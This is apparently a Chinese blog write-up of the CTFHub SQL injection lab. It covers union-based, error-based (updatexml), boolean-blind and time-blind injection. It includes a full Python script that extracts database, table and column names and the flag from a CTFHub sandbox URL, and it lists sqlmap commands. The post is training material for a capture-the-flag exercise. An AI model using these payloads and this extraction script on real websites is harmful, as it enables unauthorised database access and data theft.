CTFHUB-SQL注入

最新推荐文章于 2025-03-30 17:29:33 发布
最新推荐文章于 2025-03-30 17:29:33 发布
阅读量821 收藏 17
点赞数 17
文章标签: 数据库 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2402_87387389/article/details/145165992
版权

一、整数型注入

1.输入1,2,3判断存在整数型注入

2.判断当前表的字段个数,在字段为1,和2时有回显,判断字段数为2

3.判断注入点,查询:-1 union select 1,2    只显示2,注入点在2处

4.查询数据库,爆出数据库为sqli

5.查询表名,爆出2个表

6.有flag提示,查询表flag中的字段

7.flag表中有flag的字段,查询flag字段中的具体内容,得到flag

二、字符型注入

1.输入1,由提示可知存在字符型注入,可以通过利用#注释掉后面的内容

2.构造1’ order by 1#结构判断当前表的字段个数,在字段为1,和2时有回显,判断字段数为2

3.找注入点,在2处,依次进行爆表、数据库、字段(与整数型注入相似)

三、报错注入

1.输入1,2,3以及1’发现会出现报错

 有三种报错注入的方法:group by 重复键冲  extractvalue() 函数  updatexml() 函数

我这些方法都有尝试,主要用updatexml() 函数找flag

2.获取数据库名字

3.获取当前数据库中表的名字

1 and updatexml(1,concat('^',(select table_name from information_schema.tables where table_schema='sqli' ),'^'),1) --+

4.显示的内容超过一行它不能显示那么多,所以在 table_schema='sqli' 后加上 limit 0,1,显示第一行。然后依次获取第一、二个表名

5.有flag提示,查询表flag中的字段

四、布尔注入

1.输入1,2,3时只会出现两种表示,一个是正确一个是错误

有两种方法:手动注入和 python脚本

手动注入

思路:不论是数据库还是表还是字段,先判断长度,然后利用ascll码判断每一个字符

1:判断当前数据库的长度,利用二分法,依次慢慢与目标缩进
输入:1 and length(database())<5    显示正确
输入:1 and length(database())>5  显示错误
说明字符数在5个以内,一个一个去猜

当输入  1 and length(database())=5  时 显示正确

说明字符为4个
2:判断当前数据库的字符,利用二分法依次判断
//判断数据库的第一个字符(以此类推)
输入:1 and ascii(substr(database(),1,1))>100 
//判断数据库的第二个字符
输入:1 and ascii(substr(database(),2,1))>100
//判断数据库的第三个字符
输入:1 and ascii(substr(database(),3,1))>100
...........
由此可以判断出当前数据库为 sqli

python脚本

用pycharm运行此代码(下载requests库),改一下url就可以

# @SoftWare : PyCharm

import requests

urlOPEN = 'http://challenge-1ff99e9745e879f5.sandbox.ctfhub.com:10800/?id='
starOperatorTime = []
mark = 'query_success'


def database_name():
    name = ''
    for j in range(1, 9):
        for i in 'sqcwertyuioplkjhgfdazxvbnm':
            url = urlOPEN + 'if(substr(database(),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
            j, i)
            # print(url+'%23')
            r = requests.get(url)
            if mark in r.text:
                name = name + i

                print(name)

                break
    print('database_name:', name)


database_name()


def table_name():
    list = []
    for k in range(0, 4):
        name = ''
        for j in range(1, 9):
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                k, j, i)
                # print(url+'%23')
                r = requests.get(url)
                if mark in r.text:
                    name = name + i
                    break
        list.append(name)
    print('table_name:', list)


table_name()


def column_name():
    list = []
    for k in range(0, 3):  # 判断表里最多有4个字段
        name = ''
        for j in range(1, 9):  # 判断一个 字段名最多有9个字符组成
            for i in 'sqcwertyuioplkjhgfdazxvbnm':
                url = urlOPEN + 'if(substr((select column_name from information_schema.columns where table_name="flag"and table_schema= database() limit %d,1),%d,1)="%s",1,(select table_name from information_schema.tables))' % (
                k, j, i)
                r = requests.get(url)
                if mark in r.text:
                    name = name + i
                    break
        list.append(name)
    print('column_name:', list)


column_name()


def get_data():
    name = ''
    for j in range(1, 50):  # 判断一个值最多有51个字符组成
        for i in range(48, 126):
            url = urlOPEN + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (
            j, i)
            r = requests.get(url)
            if mark in r.text:
                name = name + chr(i)
                print(name)
                break
    print('value:', name)


get_data()

我的运行结果如下: 

C:\Users\Lenovo\Desktop\ctf-ldx\a\.venv\Scripts\python.exe C:\Users\Lenovo\Desktop\ctf-ldx\a\.venv\a.py 
s
sq
sql
sqli
database_name: sqli
table_name: ['news', 'flag', '', '']
column_name: ['flag', '', '']
c
ct
ctf
ctfh
ctfhu
ctfhub
ctfhub{
ctfhub{0
ctfhub{0b
ctfhub{0b3
ctfhub{0b33
ctfhub{0b332
ctfhub{0b332a
ctfhub{0b332a7
ctfhub{0b332a73
ctfhub{0b332a736
ctfhub{0b332a7365
ctfhub{0b332a7365e
ctfhub{0b332a7365ea
ctfhub{0b332a7365ea7
ctfhub{0b332a7365ea74
ctfhub{0b332a7365ea74e
ctfhub{0b332a7365ea74e1
ctfhub{0b332a7365ea74e1c
ctfhub{0b332a7365ea74e1c3
ctfhub{0b332a7365ea74e1c3c
ctfhub{0b332a7365ea74e1c3c3
ctfhub{0b332a7365ea74e1c3c3d
ctfhub{0b332a7365ea74e1c3c3de
ctfhub{0b332a7365ea74e1c3c3de8
ctfhub{0b332a7365ea74e1c3c3de81
ctfhub{0b332a7365ea74e1c3c3de81}
value: ctfhub{0b332a7365ea74e1c3c3de81}

Process finished with exit code 0

五、时间盲注 

1.在盲注时可以使用SQLMap工具

 输入以下指令分别查到数据库、表名、字段名以及字段内容

​
python sqlmap.py -u "网址/?id=1" --dbs
python sqlmap.py -u "网址/?id=1" -D 数据库名 --tables
python sqlmap.py -u "网址/?id=1" -D "数据库名" -T "表名" --columns
python sqlmap.py -u "网址/?id=1" -D "数据库名" -T "表名" -C "字段名"  --dump

​

六、MYsql注入

1.手动注入表名和字段名,得到flag

查找字段内容得到flag:  -1 union select 1,group_concat(字段名) from 表名

七、Cookie注入

1.使用sqlmap注入得到flag

python sqlmap.py -u "网址/?id=1" --dbs
python sqlmap.py -u "网址/?id=1" -D 数据库名 --tables
python sqlmap.py -u "网址/?id=1" -D "数据库名" -T "表名" --columns
python sqlmap.py -u "网址/?id=1" -D "数据库名" -T "表名" -C "字段名"  --dump

櫻九.923
关注
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1222
ctfhubSQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFHUB-web-SQL注入
ookami6497的博客
11-29 1002
CTFHUB SQL
ctfhub_sql注入
lyy0xfff的博客
07-27 343
CTFHub-SQL注入 文章目录CTFHub-SQL注入整数型注入字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入过滤空格UA注入Refer注入 整数型注入 由题意输入1,可以看到回显位置有两个,所以猜解有两列。 1 order by 3 1 order by 2 可以得知为2列,开始爆破数据 数据库、用户名 表名 -1 union select 1,(select group_concat(table_name) from information_schema.tables wh
ctfhub-技能树-sql注入
最新发布
weixin_64359465的博客
03-30 1056
sqlmap -r c:\2.txt -D 【数据库名】 -T 【表名】 -C xxx,xxx(字段名字) --dump 爆数据。sqlmap -r c:\2.txt -D 【数据库名】 -T 【表名】 --columns 爆指定库和表的字段名字。sqlmap -r c:\2.txt -D 【数据库名】 --tables 爆指定库的表名。(接下来注意:要将1变成-1,否则前面不报错后面就不回显了)sqlmap -r ---指定数据包。sqlmap -u ---指定连接。
CTFHub(web SQL注入
2301_81105268的博客
04-18 1425
id=1这个语句在数据库中返回几列,也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列,然后才可以用union进行联合查询。(2)可以用concat()或concat_ws()或group_concat()—[见数据库连接语句]----使得在sql注入时快速获得数据库的相关信息。使用order by语句进行测试:1 order by 1、1 order by 2等,直到报错为止,报错的前一个数,为字段数。
CTFHub-sql注入
qq_60905276的博客
01-30 5872
1.整数型注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 954
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
ctfhub-sql布尔盲注
god_001的博客
06-01 831
打开网址,先输入: 得到:输入: 得到:看出可以布尔盲注查看当前表名: 于是先得到当前数据库种包含的表名: 得到: 再查看表格flag包含的字段: 得到: 于是最后一步读取flag表种flag字段的内容: 得到:
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1352
CTFHUB-WEB-SQL注入
二、CTF-Web-SQL注入(记录CTF学习)
qq_27920699的博客
12-16 557
个人CTF学习之路
ctfhub SQL注入
mrwangtw的博客
09-03 355
整数型注入 (1)判断是否存在注入 1)加单引号 2)加and 1=1 3)加and 1=2 (2)查询字段 id=1 order by 2如果返回和id=1一样的结果,则order by 3,如果返回值与id=1时不同,那么字段就是2个 (3)查询SQL语句插入位置 ?id=-1 union select 1,2;查看结果 (4)获取数据库名 获取当前数据库 ?id=-1 union select 1,database() 获取所有数据库 ?id=-1 union se.
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1852
CTFHub——SQL注入(报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入、Refer注入、过滤空格)
CTFHub---SQL注入
weixin_53736204的博客
07-28 788
1.输入1发现有两个回显,那么直接查库2.查表3.查flag表的字段名4.查表数据。
Ctfhub - web -- SQL注入
m0_52920608的博客
01-28 4080
CTFHub sql注入 web mysql python脚本
CTFHub~SQL注入超简单详细教程
weixin_67832625的博客
08-14 2347
本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解,让练习者对SQL注入有更详细的了解和深入,如有什么问题,随时联系作者
CTFHub-SQL注入
yuqie的博客
06-13 1171
当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。需要注意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
CTFHub(SQL注入)
cxiaodi的博客
05-09 1380
CTFHubSQL注入专题)
CTFHUB--SQL注入
m0_65766842的博客
03-14 250
1
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作。 要进行SQL注入攻击,攻击者需要找到目标应用程序中存在注入漏洞的输入点,并通过构造恶意的SQL语句来利用这些漏洞。以下是一些常见的SQL注入技巧和防御措施: 1. 基于布尔盲注的SQL注入:攻击者通过构造恶意的SQL语句,并根据应用程序的不同响应来判断注入是否成功。 2. 基于错误的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的错误信息来获取有用的信息。 3. 基于时间延迟的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的时间延迟,从而获取有用的信息。 为了防止SQL注入攻击,开发人员可以采取以下措施: 1. 使用参数化查询或预编译语句来构建和执行SQL查询,而不是直接拼接用户输入到SQL语句中。 2. 对用户输入进行严格的验证和过滤,确保只接受预期的输入,并对输入进行适当的转义或编码。 3. 最小化应用程序的权限,限制数据库用户的权限,并使用最小化的特权来执行数据库查询。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值